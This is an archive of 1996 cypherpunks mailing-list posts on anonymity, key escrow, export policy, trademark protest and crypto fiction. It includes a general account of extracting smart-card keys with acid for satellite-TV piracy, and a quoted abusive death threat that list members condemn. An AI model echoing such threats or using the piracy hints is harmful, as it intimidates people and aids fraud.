>    One of the challengers, Avondale Web page designer Bonnie Nadri, said
>she already has removed some links from her pages, including the logos of
>Coca-Cola, Microsoft and Netscape Communications, because of the law.
>    The challengers say the wording of the law appears to prohibit
>anonymity. Eric Van Pelt, president of the gay support group Atlanta
>Veterans Alliance, said his organization joined the suit to shield the
>identity of
>two gay, active-duty military members of the AVA and to protect their
>compliance with the Pentagon's "don't ask, don't tell" policy.
>    "We made them take an oath of confidentiality to join AVA; we don't want
>to expose them to criminal charges just for sending e-mail," said Van Pelt.
>    RealAudio playback of Tuesday's press conference and the full text of
>the lawsuit are available from EFGA.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 20 Nov 1996 14:08:20 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anon
In-Reply-To: <v02140b03aeb905639c67@[204.62.132.248]>
Message-ID: <v03007808aeb93101f7b7@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:06 pm -0500 11/20/96, Roderick Simpson wrote:
>Who has made the strongest case _against_ anonymity on the Net that you
>have ever heard? Someone intelligent and theoretical rather than trapped in
>some child porn or commerce pov.

Actually, the "commerce pov" will probably be the one which kills all
arguments for anonymity. digital bearer certificates, like digital cash,
are always going to be cheaper than book entries.

Bearer certificates are the ultimate economic argument for anonymity. We
just couldn't implement them until Chaum figured out how.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@ctrl-alt-del.com>
Date: Wed, 20 Nov 1996 17:08:39 -0800 (PST)
To: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Subject: Re: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
Message-ID: <3.0b36.32.19961120170759.00f33e30@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:52 PM 11/20/96 -0500, Jeremiah A Blatz wrote:

>Trademarks are not copyrights. There is no fair use for trademarks. In
>addition, civil suits are not criminal trials. The USG can't throw
>your ass in jail for making "big brother inside" stickers, but Intel
>can sue your ass off.
>In a related note, you may be safe from lible suits...

Make you wonder how Mad magazine has gotten away with it all these years...
 (Maybe we could get Mad to print them!  Would make an interesting cover...)

ObSpyVSSpy:  Mad TV (on Fox) has been running animated Spy V.S. Spy
cartoons.  (Usually one or two per episode.)  Probibly best thing about the
show.  (I mentioned this because one "prominent Cypherpunk" at Orycon had
not known about them.)
 
---
|  "Remember: You can't have BSDM without BSD." - alan@ctrl-alt-del.com  |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jbugden@smtplink.alis.ca
Date: Wed, 20 Nov 1996 14:15:16 -0800 (PST)
To: cypherpunks@toad.com
Subject: Social Security workers in bribery plot
Message-ID: <9610208485.AA848538867@smtplink.alis.ca>
MIME-Version: 1.0
Content-Type: text/plain


Copyright c 1996 Nando.net
Copyright c 1996 From staff and wire reports 

NEW YORK (Nov 20, 1996 4:42 p.m. EST) - Several Social Security 
Administration employees have been charged with giving confidential 
consumer information to credit card thieves in exchange for bribes as 
low as $10, authorities said on Wednesday.

[...]

The investigation began in February when investigators for Citicorp's 
Citibank found that a large number of Citibank credit cards had been 
sent to customers but never received. But the cards had been activated.

[...]

The Social Security Administration then conducted security reviews to 
determine if any employees had accessed files of individuals.

Gimlett said the investigation was significant because it demonstrated 
"the reality that employees of government agencies or corporations who 
have access to personal information may take advantage of their position 
of trust to steal personal information and sell it for financial gain."

[...]





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Craig S. Wright" <craigsw@ozemail.com.au>
Date: Tue, 19 Nov 1996 22:40:04 -0800 (PST)
To: "'cypherpunks@toad.com>
Subject: Snare, any info
Message-ID: <01BBD709.894CA640@thorin.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have any info on a piece of software called: Snare

It is an encryption program for tcp/ip from windows PC's or so they say

from http://www.capres.com

Thanks Craig





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 20 Nov 1996 15:03:22 -0800 (PST)
To: John Anonymous MacDonald <nobody@cypherpunks.ca>
Subject: Re: Rogue Governments Issuing Policy Tokens
In-Reply-To: <199611201533.HAA14944@abraham.cs.berkeley.edu>
Message-ID: <Pine.SUN.3.94.961120180041.29265E-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, John Anonymous MacDonald wrote:

> Date: Wed, 20 Nov 1996 07:33:51 -0800
> From: John Anonymous MacDonald <nobody@cypherpunks.ca>
> To: cypherpunks@toad.com
> Subject: Re: Rogue Governments Issuing Policy Tokens
> 
> "Timothy C. May" <tcmay@got.net> writes:
> 
> > I mention Libya as an extreme example (the same example cited in the
> > Fiat-Shamir "is-a-person" example of rogue governments issuing passports).
> > The examples above are likely targets for policy card exports, though. The
> > issue is clear: the list of "fully-compliant" nations is short indeed, and
> > few nations are going to accept imports of U.S. technology in which the
> > U.S. government sets the policy on how and where the imports may be used.
> 
> Most "dual-use" items are export-restricted to Lybia.  That means US
> businesses will have trouble selling any computers or even things like
> trucks to Lybia.  For crypto tokens not to be available there does not
> seem to be a huge deal, in comparison with everything else.

You've obviously never been to or heard of Brussels.

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Wed, 20 Nov 1996 18:02:45 -0800 (PST)
To: rod@wired.com
Subject: Re: Anon
Message-ID: <199611210202.SAA10970@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


As I mentioned a couple of days ago, science fiction writer David Brin
has an argument against not only anonymity, but _privacy_ as well.
Where cypherpunks tend to think of privacy as both beneficial and
inevitable, Brin sees it as harmful and doomed.  He has an article in
the December 1996 issue of Wired discussing his ideas.

BTW cypherpunk Doug Barnes is also quoted several times in the long
article in that issue by Neal Stephenson (Snow Crash, The Diamond Age)
about the undersea cables that carry most transnational information
traffic.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Wed, 20 Nov 1996 18:09:15 -0800 (PST)
To: frissell@panix.com
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <199611210209.SAA10975@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Duncan Frissell <frissell@panix.com>
> The problem with straight SF for me is that computers and networks have
> changed the future so much that (in the words of the motto of the SF
> Writer's Association) The Future Ain't What It Used to Be.  The science
> fictional futures of my childhood are now dead as doornails.  And I can't
> enjoy contemporary SF that doesn't include a healthy dose of computers and
> networking.  

I find this to be largely true as well.  The cyberpunk genre does the
best job at grappling with the impact of communications tech but it is
traditionally dystopian.  It would be nice to see a story about better
living through crypto.

What fiction can people recommend which presents crypto/privacy issues
realistically?  How about this new book that Neal Stephenson is working
on, does anyone know what it's about?  His short story, "Hack the Spew",
a few months ago (in Wired, I think?) had a strong crypto flavor.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal Finney <hal@rain.org>
Date: Wed, 20 Nov 1996 18:27:41 -0800 (PST)
To: froomkin@law.miami.edu
Subject: Re: Stewart Baker on new crypto rules
Message-ID: <199611210227.SAA11010@crypt.hfinney.com>
MIME-Version: 1.0
Content-Type: text/plain


From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
> http://www.steptoe.com/oped.htm
>
> argues that industry won't accept any system that threatens to cut off
> backwards compatibility after 2 years, hence DES export liberalization
> will have to extend beyond the proposed period.

I take a slightly different moral.  Baker (former NSA attorney) writes:

> If buying key-recovery encryption means customers must give up all
> of their legacy encryption systems, key recovery products will carry a
> near-fatal burden in many markets where encryption is now used widely. The
> transition to key recovery will have to be gradual or it won't happen
> at all.

What I see this as is a call to come up with architectures that will allow
transparent phase-in of government key access (so-called "key recovery")
technology.  The current HP proposal fits in very well with this model.
The appear to be planning on using standard API's so that applications
will be able to switch to using key escrow software without changing the
applications themselves, just the OS.  Maybe there could be a transition
period where both the old and new crypto would both be accepted, then
after a period of time the old wouldn't work any more.

As Baker goes on to say:

> Three years ago, no one in the PC world would have bought an operating
> system that didn't run MS-DOS. Three years from now, we'll be happy to buy
> an operating system that is backward-compatible with Windows 95 but not
> with MS-DOS. And then, at last, we'll throw out all our old DOS programs.

This suggests to me that we need to be vigilant in watching for systems that
will allow for easy "drop in" of key escrow.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@zifi.genetics.utah.edu (Anonymous)
Date: Wed, 20 Nov 1996 17:36:39 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: FUCK YOU punk
Message-ID: <199611210136.SAA01646@zifi.genetics.utah.edu>
MIME-Version: 1.0
Content-Type: text/plain



_______________________________________________________________________________
From: aga on Wed, Nov 20, 1996 15:24
Subject: FUCK YOU punk/was:Taking out the garbage
To: freedom-knights@jetcafe.org
Cc: cypherpunks@toad.com

>If you try to make or enforce any rules and YOU DIE cocksucker!

You might want to watch yourself.  It would be hard to *not* see this as a
direct threat...

>Your presents shall be totally eliminated form this InterNet!
          ^^^^^^^
Yeah, Lucky!  You better watch out, or there'll be NO CHRISTMAS!! :-)

>Your connection will be TERMINATED at once! 

Suddenly, agatha is everyone's sysadmin...

>fuck you punk, and fuck all of your "rules"

Whether stated or not, there _are_ certain guidelines (or rules) we all 
should follow, just so we aren't *ASSHOLES*...

>-aga





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Wed, 20 Nov 1996 19:39:27 -0800 (PST)
To: "tfs@adsl-122.cais.com>
Subject: Re: U.S. CIA employee caught spying
Message-ID: <19961121033534640.AAA222@rn244.io-online.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 18 Nov 1996 17:05:47 -0500 (EST), Tim Scanlon wrote:

>This is on the local DC news;

>Harold Nicholson age 46, a CIA employee was arrested for spying today
>at Dulles airport. He allegedly has been working for the Russians
>for the past 2 years.

Here's a good question to ask: "Why are we getting security policy from the
[un]intelligence agencies?"

What will get mentioned, however, will be: "If he'd been using PGP we'd
never have caught him.  This is why we need GAK!"

#  Chris Adams  <adamsc@io-online.com> | http://www.io-online.com/adamsc/adamsc.htp
#  <cadams@acucobol.com>                 | send mail with subject "send PGPKEY"
"That's our advantage at Microsoft; we set the standards and we can change them."
   --- Karen Hargrove, Microsoft (quoted in the Feb 1993 Unix Review editorial)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremiah A Blatz <jer+@andrew.cmu.edu>
Date: Wed, 20 Nov 1996 15:54:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
In-Reply-To: <199611202119.PAA04919@smoke.suba.com>
Message-ID: <0mYtaw200YUf0AY5Q0@andrew.cmu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

snow <snow@smoke.suba.com> writes:
> > "Timothy C. May" <tcmay@got.net> writes:
> >> Time to dust off those "Big Brother Inside" stickers someone had printed up
> >> a couple of years ago.
> >I know that Intel has succeeded in forcing the "Linux Inside" logo and sticke\
> rs
> >off the net on threats of trademark infringement suits.  I have a feeling "Big
> >Brother Inside" would make them even more upset.
> 
>      Question:
> 
>      If one were to start a "big brother inside" campaign against Intel as a 
> form of _political_ protest against their (and the goverments) actions and 
> policies, would it be considered trademark infringement, or could it be 
> "protected speech" under the first amendment? 

Trademarks are not copyrights. There is no fair use for trademarks. In
addition, civil suits are not criminal trials. The USG can't throw
your ass in jail for making "big brother inside" stickers, but Intel
can sue your ass off.
In a related note, you may be safe from lible suits...

Jer

"standing on top of the world/ never knew how you never could/ never knew
 why you never could live/ innocent life that everyone did" -Wormhole

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMpOZsckz/YzIV3P5AQFN0AL/RRUETlRQRgSsREu1xwYnBUSIQ+JAH0jq
chrtsiFeSKALFeuM0oDfSIR4q1WZ4krnmhISdog3bSkrm5eN6D4lsDB2NRofy1oZ
jLAfmuRHUW0A6Kt5nH+PViqNZqEjBL+G
=XMgA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Wuertele <dave@cave.gctech.co.jp>
Date: Wed, 20 Nov 1996 02:39:43 -0800 (PST)
To: "Timothy C. May" <tcmay@got.net>
Subject: US supporting dissidents? (was Re: Rogue Governments Issuing Policy Tokens)
In-Reply-To: <v03007800aeb7b8522b6a@[207.167.93.63]>
Message-ID: <ygelobxjbm7.fsf@cave.gctech.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


"Timothy C. May" <tcmay@got.net> writes:

> (As noted in the Declan story, the machinery of having government issue
> policy cards, if successful, essentially blocks dissidents and
> revolutionaries from gaining certain powers. The U.S. _used_ to support
> dissidents and revolutionaries in various countries...no longer, I guess.
> The price of winning the Cold War: complacency.)

I don't think it has to do with complacency.  US support for "dissidents and
revolutionaries" was definitely not based on revolutionaryism, nor on
"cold-war" policy support for democracy, as Noam Chomsky likes to drill into
our heads over and over.

> Time to dust off those "Big Brother Inside" stickers someone had printed up
> a couple of years ago.

I know that Intel has succeeded in forcing the "Linux Inside" logo and stickers
off the net on threats of trademark infringement suits.  I have a feeling "Big
Brother Inside" would make them even more upset.

Dave




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 20 Nov 1996 20:51:23 -0800 (PST)
To: cypherpunks@toad.com
Subject: RE: FUCK YOU punk
In-Reply-To: <199611210136.SAA01646@zifi.genetics.utah.edu>
Message-ID: <Pine.3.89.9611201929.A26330-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Anonymous wrote:

> 
> _______________________________________________________________________________
> From: aga on Wed, Nov 20, 1996 15:24
> Subject: FUCK YOU punk/was:Taking out the garbage
> To: freedom-knights@jetcafe.org
> Cc: cypherpunks@toad.com
> 
> >If you try to make or enforce any rules and YOU DIE cocksucker!
> 
> You might want to watch yourself.  It would be hard to *not* see this as a
> direct threat...

Indeed, I am contemplating litigation. I'll have dinner with the local DA 
and Sheriff in a few days. I'll bounce the original message of them as 
well as my attorney and see what they have to say.

-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lucky Green <shamrock@netcom.com>
Date: Wed, 20 Nov 1996 20:17:29 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Stewart Baker on new crypto rules
In-Reply-To: <199611210227.SAA11010@crypt.hfinney.com>
Message-ID: <Pine.3.89.9611202018.A26330-0100000@netcom14>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Hal Finney wrote:

> What I see this as is a call to come up with architectures that will allow
> transparent phase-in of government key access (so-called "key recovery")
> technology.  The current HP proposal fits in very well with this model.
> The appear to be planning on using standard API's so that applications
> will be able to switch to using key escrow software without changing the
> applications themselves, just the OS.  Maybe there could be a transition
> period where both the old and new crypto would both be accepted, then
> after a period of time the old wouldn't work any more.

Just so we are all clear about what HP is up to: in August, 1996, I
attended a presentation by HP's policy person. He was touting the
anti-four horsemen properties of HP/TIS/unnamed other's "voluntary" "key
recovery"  system. When I pointed out to him that voluntary GAK could not
possibly defend against criminals using strong crypto, since such
criminals are unlikely to register their keys with the "escrow" agency, he
replied: 

"There are many 
possible interpretations of the words 'voluntary' and 'mandatory'."

I am willing to testify to this under oath.

I don't know what dictionary HP is using. Orwell himself must have 
written it.

--Lucky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 20 Nov 1996 18:05:00 -0800 (PST)
To: declan@eff.org (Declan McCullagh)
Subject: Re: Cyber Power in Forbes
In-Reply-To: <Pine.SUN.3.91.961120072630.2518E-100000@eff.org>
Message-ID: <199611210222.UAA05562@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> Interesting. I'll pick it up.
> Huber likes to say that Orwell was wrong in saying technology is a threat
> to civil liberties.Personally, I think the jury's still out and I suspect
> he does too. But Huber also believes that saying something loudly,
 repeatedly makes it true. 

     It isn't the machines, it is the people.

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Wed, 20 Nov 1996 18:09:25 -0800 (PST)
To: tcmay@got.net (Timothy C. May)
Subject: Re: Innocent until proven guilty
In-Reply-To: <v03007800aeb8f3907bb2@[207.167.93.63]>
Message-ID: <199611210226.UAA05592@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 1:36 AM -0600 11/20/96, snow wrote:
> >> At 01:02 =EC=EC 19/11/1996 -0500, Clay Olbon II wrote:
> >> >with _serious_ issues of 'unemployability'., FURTHERMORE people are NEVER
> >> >guilty before PROVEN so. Guilt or Innocence is NOT a matter of 'opinion',
> >    Huh? People are most certainly guilty before "proven" so, the government
> >just isn't allowed to _assume_ their guilt, or to _act_ like they are guilty.
> >     If you purchase LSD in America, you are guilty of a felony--Drug
> >trafficing. Wether the court _finds_ you guilty or not is another story.
> 
> In this case, the putative crime is "drug trafficking" or "possession,"
> depending. One is still presumed innocent until proven guilty. To wit, the
                          ^^^^^^^^
> state must prove its case.
> I rather suspect that any prosecutors or defense lawyers on this list will
> confirm that an LSD case is hardly a case of "guilty until proven innocent."

      Let me put it this way. Do you really believe that Mr. Simpson is "not
guilty" of murder, even tho' the courts found him so? 

      If I purchase LSD, I am guilty of BOTH trafficing and possession,
I _did_ it. After all, you were the one with the "felon" in your .signature. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sean Roach <roach_s@alph.swosu.edu>
Date: Wed, 20 Nov 1996 20:38:22 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: 1996 Codebreakers
Message-ID: <199611210438.UAA02202@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Adam Shostack <adam@homeport.org> writes:
>> 	I just got a review copy of the new (1996) ed. of Kahn's The
>> Codebreakers from my local used bookstore.  Its a little disapointing,
>...
>> & DH.  Nothing on Cypherpunks, little on how privacy can be enhanced.
The above was stripped from a reply made by Dr Dimitri Vulis.

I have just one question, was the copy that you purchased hardcopy or paperback?
I found the paperback in a school library and found that it said that the
technical portion had been abridged to save space, (and money).
I cannot say that I read the whole text, only the first half chapter and
then some skipping around trying to find the RSA algorthim.  I later found
it in a periodical to which I am subscribed.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Wed, 20 Nov 1996 18:01:12 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anon
Message-ID: <3.0b36.32.19961120210120.00758920@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:06 PM 11/20/96 -0700, Roderick Simpson wrote:
>Who has made the strongest case _against_ anonymity on the Net that you
>have ever heard? Someone intelligent and theoretical rather than trapped in
>some child porn or commerce pov.
>
>Thanks,
>Rod

Recruiting for a future Brain Tennis I take it?

The Thursday Computer columnist for the WSJ (whose name escapes me) is a
possibility.  I don't know how strong he is but he is consistently opposed.

I wouldn't recommend L. Detweiler though he is opposed to anonymity.

How about Esther Dyson?

DCF




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hack Watch News <kooltek@iol.ie>
Date: Wed, 20 Nov 1996 13:29:32 -0800 (PST)
To: jf_avon@citenet.net
Subject: Re: Cracks Are Found In Smartcard Security (fwd)
In-Reply-To: <9611201602.AB22689@cti02.citenet.net>
Message-ID: <329377A5.4715@iol.ie>
MIME-Version: 1.0
Content-Type: text/plain


Jean-Francois Avon wrote:

> In what context?  (How does that applies to PGP? Did he say that for short
> keys used to encrypt data directly?)
> 
> Sorry for my cluelessness.
> 

The smart cards in use by banks to protect transactions seem to use RSA
and DES algorithms. Now these algorithms are computationally difficult
to hack. Therefore an attack via cryptographical route would not be
envisaged by those who specify the system for the bank.

With the research into popping smart cards using fuming Nitric Acid, the
keys used for these transactions could be extracted from a smart card
within a few hours. Thus with the keys extracted, RSA and DES become
even more vulnerable because they are such well known algorithms. It
would be easy for someone to implement them in a pirate smart card as
indeed has been the case in European satellite Pay TV piracy. (France
Telecom used DES as the cryptographical basis for their EuroCrypt-M
access control overlay for the D2-MAC television standard).

The Fiat-Shamir ZKT was also demonstrated to be vulnerable using a
similar approach. It was possible to extract the necessary data to allow
pirate cards to spoof a valid ZKT response. Of course the original
version of this flaw was due to incompetence on the part of the system
designers (they never secured the card-decoder interface
microcontroller). A later implementation integrated the result of the
ZKT with the output of the algorithm thus making it a more secure
implemenation. However the smart card was popped (reverse-engineered
using the techniques desicribed in the paper) making it all academic.

The bottom line is that the security of smart cards is both highly
overrated and depends on a high level of bluff. Most people would not
attack a smart card because they think it is secure. However in European
satellite television piracy, most of the systems have been shown to have
flaws either in the technology or the implementation. (Naturally the
best reference on this is European Scrambling Systems 5 - The Black Book
ISBN: 1-873556-22-5 ;-) )

The relevant paper is at:
http://www.cl.cam.ac.uk/users/rja14/tamper.html

Regards...jmcc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 20 Nov 1996 19:20:14 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anon
In-Reply-To: <v02140b03aeb905639c67@[204.62.132.248]>
Message-ID: <Dw3PXD33w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


rod@wired.com (Roderick Simpson) writes:

> Who has made the strongest case _against_ anonymity on the Net that you
> have ever heard? Someone intelligent and theoretical rather than trapped in
> some child porn or commerce pov.

Cypherpunks themselves are opposed to complete anonymity. They insist on
being able to track down and silence whoever (ab)uses the remailers to
distribute homophobic or otherwise politically incorrect traffic. Just
search the archives for their advocacy of "identify escrow".

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Wed, 20 Nov 1996 19:02:24 -0800 (PST)
To: Hal Finney <hal@rain.org>
Subject: Re: Stewart Baker on new crypto rules
In-Reply-To: <199611210227.SAA11010@crypt.hfinney.com>
Message-ID: <Pine.SUN.3.95.961120220506.12517D-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


 On Wed, 20 Nov 1996, Hal Finney wrote:
> 
> This suggests to me that we need to be vigilant in watching for systems that
> will allow for easy "drop in" of key escrow.
> 
I dunno.  Drop in in some but not all cases will equal drop out.


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Wed, 20 Nov 1996 19:13:57 -0800 (PST)
To: Roderick Simpson <rod@wired.com>
Subject: Re: Anon
In-Reply-To: <v02140b03aeb905639c67@[204.62.132.248]>
Message-ID: <Pine.SUN.3.95.961120221542.12517H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Roderick Simpson wrote:

> Who has made the strongest case _against_ anonymity on the Net that you
> have ever heard? Someone intelligent and theoretical rather than trapped in
> some child porn or commerce pov.
 
For a summary of some arguments made by Justice Scalia and others see

http://www.law.miami.edu/~froomkin/articles/oceanno.htm#xtocid58313


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law |
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Wed, 20 Nov 1996 19:32:24 -0800 (PST)
To: Robert Hettinga <rah@shipwright.com>
Subject: Re: Anon
In-Reply-To: <v03007808aeb93101f7b7@[206.119.69.46]>
Message-ID: <Pine.SUN.3.94.961120223040.4194F-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 20 Nov 1996, Robert Hettinga wrote:

> Date: Wed, 20 Nov 1996 17:07:35 -0500
> From: Robert Hettinga <rah@shipwright.com>
> To: Roderick Simpson <rod@wired.com>, cypherpunks@toad.com
> Subject: Re: Anon
> 
> At 2:06 pm -0500 11/20/96, Roderick Simpson wrote:
> >Who has made the strongest case _against_ anonymity on the Net that you
> >have ever heard? Someone intelligent and theoretical rather than trapped in
> >some child porn or commerce pov.
> 
> Actually, the "commerce pov" will probably be the one which kills all
> arguments for anonymity. digital bearer certificates, like digital cash,
> are always going to be cheaper than book entries.
> 
> Bearer certificates are the ultimate economic argument for anonymity. We
> just couldn't implement them until Chaum figured out how.


Wait... I didn't catch the above.

Which is a pro-anonymity and which a con-anonymity argument?

> 
> Cheers,
> Bob Hettinga
> 
> -----------------
> Robert Hettinga (rah@shipwright.com)
> e$, 44 Farquhar Street, Boston, MA 02131 USA
> "The cost of anything is the foregone alternative" -- Walter Johnson
> The e$ Home Page: http://www.vmeng.com/rah/
> 
> 
> 

--
Forward complaints to : European Association of Envelope Manufactures
Finger for Public Key   Gutenbergstrasse 21;Postfach;CH-3001;Bern
Vote Monarchist         Switzerland





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 20 Nov 1996 19:47:29 -0800 (PST)
To: cypherpunks@toad.com
Subject: CAVE Report
Message-ID: <1.5.4.32.19961121034520.006ab8dc@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


We've put the CAVE-based report at:

   http://jya.com/tr453.htm  (46 kb with 7 images)


CAVE = Cellular Authentication and Voice Encryption algorithm.

Nokia, for one, uses a CAVE algorithm to secure its latest toy.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 20 Nov 1996 22:49:31 -0800 (PST)
To: Hal Finney <frissell@panix.com
Subject: Re: Why I Don't Read SF Much Anymore
Message-ID: <199611210649.WAA11903@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At  6:09 PM 11/20/96 -0800, Hal Finney wrote:
>What fiction can people recommend which presents crypto/privacy issues
>realistically?  How about this new book that Neal Stephenson is working
>on, does anyone know what it's about?  His short story, "Hack the Spew",
>a few months ago (in Wired, I think?) had a strong crypto flavor.

"A Fire Upon the Deep", Vernor Vinge presents one time pads as the most
valuable item in intersteller commerce.  Crypto also plays an important
role during the final battle.  He also has a new take on exceeding the
speed (of light) limit, and a well drawn group-mind species.


-------------------------------------------------------------------------
Bill Frantz       | The lottery is a tax on    | Periwinkle -- Consulting
(408)356-8506     | those who can't do math.   | 16345 Englewood Ave.
frantz@netcom.com |       - Who 1st said this? | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 20 Nov 1996 20:49:37 -0800 (PST)
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: Anon
In-Reply-To: <v03007808aeb93101f7b7@[206.119.69.46]>
Message-ID: <v03007802aeb982a161f1@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:31 pm -0500 11/20/96, Black Unicorn wrote:
>> Actually, the "commerce pov" will probably be the one which kills all
>> arguments for anonymity. digital bearer certificates, like digital cash,
             ^^^ Oops. Belay that. "against" goes here...

>> are always going to be cheaper than book entries.
>>
>> Bearer certificates are the ultimate economic argument for anonymity. We
>> just couldn't implement them until Chaum figured out how.
>
>
>Wait... I didn't catch the above.
>
>Which is a pro-anonymity and which a con-anonymity argument?

Sorry about that...

Emily Latella, RIP


Cheers,
Bob Hettinga


-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"The cost of anything is the foregone alternative" -- Walter Johnson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 20 Nov 1996 20:53:10 -0800 (PST)
To: Hal Finney <frissell@panix.com
Subject: Re: Why I Don't Read SF Much Anymore
In-Reply-To: <199611210209.SAA10975@crypt.hfinney.com>
Message-ID: <v03007808aeb98427bdc3@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


